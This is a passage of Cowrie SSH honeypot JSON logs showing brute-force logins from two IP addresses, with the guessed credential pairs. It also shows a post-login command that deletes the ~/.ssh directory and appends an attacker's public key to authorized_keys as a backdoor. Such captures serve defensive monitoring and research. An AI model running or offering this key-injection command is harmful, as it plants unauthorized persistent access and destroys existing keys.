mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:05:10.410551Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:05:10.674792Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:05:10.675812Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.session.connect","src_ip":"103.193.178.227","src_port":55532,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0874f9a30f9","protocol":"ssh","message":"New connection: 103.193.178.227:55532 (1.2.3.4:22) [session: d0874f9a30f9]","sensor":"my-vps","timestamp":"2025-09-09T06:05:10.940975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:05:10.942054Z","src_ip":"103.193.178.227","session":"d0874f9a30f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:05:11.205468Z","src_ip":"103.193.178.227","session":"d0874f9a30f9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:05:12.299289Z","src_ip":"103.193.178.227","session":"d0874f9a30f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47106,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bbcac5dd5cc","protocol":"ssh","message":"New connection: 212.227.235.229:47106 (1.2.3.4:22) [session: 2bbcac5dd5cc]","sensor":"my-vps","timestamp":"2025-09-09T06:05:12.851424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:05:12.852273Z","src_ip":"212.227.235.229","session":"2bbcac5dd5cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:05:12.933395Z","src_ip":"212.227.235.229","session":"2bbcac5dd5cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60216,"dst_ip":"1.2.3.4","dst_port":22,"session":"006e92d84fcd","protocol":"ssh","message":"New connection: 212.227.235.229:60216 (1.2.3.4:22) [session: 006e92d84fcd]","sensor":"my-vps","timestamp":"2025-09-09T06:05:13.205912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:05:13.206801Z","src_ip":"212.227.235.229","session":"006e92d84fcd"}
{"eventid":"cowrie.login.failed","username":"tunnel","password":"changeme","message":"login attempt [tunnel/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T06:05:13.298835Z","src_ip":"212.227.235.229","session":"2bbcac5dd5cc"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:05:13.454020Z","src_ip":"212.227.235.229","session":"006e92d84fcd"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:05:13.564282Z","src_ip":"103.193.178.227","session":"d0874f9a30f9"}
{"eventid":"cowrie.session.connect","src_ip":"103.193.178.227","src_port":55546,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c1059fbfdf8","protocol":"ssh","message":"New connection: 103.193.178.227:55546 (1.2.3.4:22) [session: 5c1059fbfdf8]","sensor":"my-vps","timestamp":"2025-09-09T06:05:13.829525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:05:13.837578Z","src_ip":"103.193.178.227","session":"5c1059fbfdf8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:05:14.103275Z","src_ip":"103.193.178.227","session":"5c1059fbfdf8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:05:14.382306Z","src_ip":"212.227.235.229","session":"2bbcac5dd5cc"}
{"eventid":"cowrie.login.failed","username":"adam","password":"1234","message":"login attempt [adam/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:05:14.480406Z","src_ip":"212.227.235.229","session":"006e92d84fcd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:05:15.179299Z","src_ip":"103.193.178.227","session":"5c1059fbfdf8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:05:15.458384Z","src_ip":"103.193.178.227","session":"5c1059fbfdf8"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:05:15.459468Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:05:15.728570Z","src_ip":"212.227.235.229","session":"006e92d84fcd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54094,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3b96d18e59a","protocol":"ssh","message":"New connection: 212.227.235.229:54094 (1.2.3.4:22) [session: b3b96d18e59a]","sensor":"my-vps","timestamp":"2025-09-09T06:05:17.834749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:05:17.835918Z","src_ip":"212.227.235.229","session":"b3b96d18e59a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:05:18.015962Z","src_ip":"212.227.235.229","session":"b3b96d18e59a"}
{"eventid":"cowrie.login.failed","username":"ftpadmin","password":"1234567890","message":"login attempt [ftpadmin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T06:05:18.750890Z","src_ip":"212.227.235.229","session":"b3b96d18e59a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:05:19.924559Z","src_ip":"212.227.235.229","session":"b3b96d18e59a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40614,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd250c400904","protocol":"ssh","message":"New connection: 212.227.235.229:40614 (1.2.3.4:22) [session: bd250c400904]","sensor":"my-vps","timestamp":"2025-09-09T06:05:35.368850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:05:35.373043Z","src_ip":"212.227.235.229","session":"bd250c400904"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:05:35.546731Z","src_ip":"212.227.235.229","session":"bd250c400904"}
{"eventid":"cowrie.login.failed","username":"debian","password":"0","message":"login attempt [debian/0] failed","sensor":"my-vps","timestamp":"2025-09-09T06:05:36.252131Z","src_ip":"212.227.235.229","session":"bd250c400904"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:05:37.436954Z","src_ip":"212.227.235.229","session":"bd250c400904"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58930,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5c3ad634906","protocol":"ssh","message":"New connection: 212.227.235.229:58930 (1.2.3.4:22) [session: c5c3ad634906]","sensor":"my-vps","timestamp":"2025-09-09T06:06:15.281224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:06:15.282073Z","src_ip":"212.227.235.229","session":"c5c3ad634906"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:06:15.360848Z","src_ip":"212.227.235.229","session":"c5c3ad634906"}
{"eventid":"cowrie.login.failed","username":"public","password":"111","message":"login attempt [public/111] failed","sensor":"my-vps","timestamp":"2025-09-09T06:06:15.716734Z","src_ip":"212.227.235.229","session":"c5c3ad634906"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:16.798381Z","src_ip":"212.227.235.229","session":"c5c3ad634906"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48124,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b08c9867a71","protocol":"ssh","message":"New connection: 212.227.235.229:48124 (1.2.3.4:22) [session: 8b08c9867a71]","sensor":"my-vps","timestamp":"2025-09-09T06:06:19.220241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:06:19.220998Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:06:19.469468Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.login.success","username":"root","password":"123456xx","message":"login attempt [root/123456xx] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:06:20.356179Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:06:20.766150Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:06:20.767023Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:06:20.768228Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:20.940295Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:06:21.299719Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:06:21.300469Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:06:21.473519Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:06:21.474553Z","src_ip":"212.227.235.229","session":"8b08c9867a71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49612,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a3893540cee","protocol":"ssh","message":"New connection: 212.227.235.229:49612 (1.2.3.4:22) [session: 2a3893540cee]","sensor":"my-vps","timestamp":"2025-09-09T06:06:21.657727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:06:21.658534Z","src_ip":"212.227.235.229","session":"2a3893540cee"}
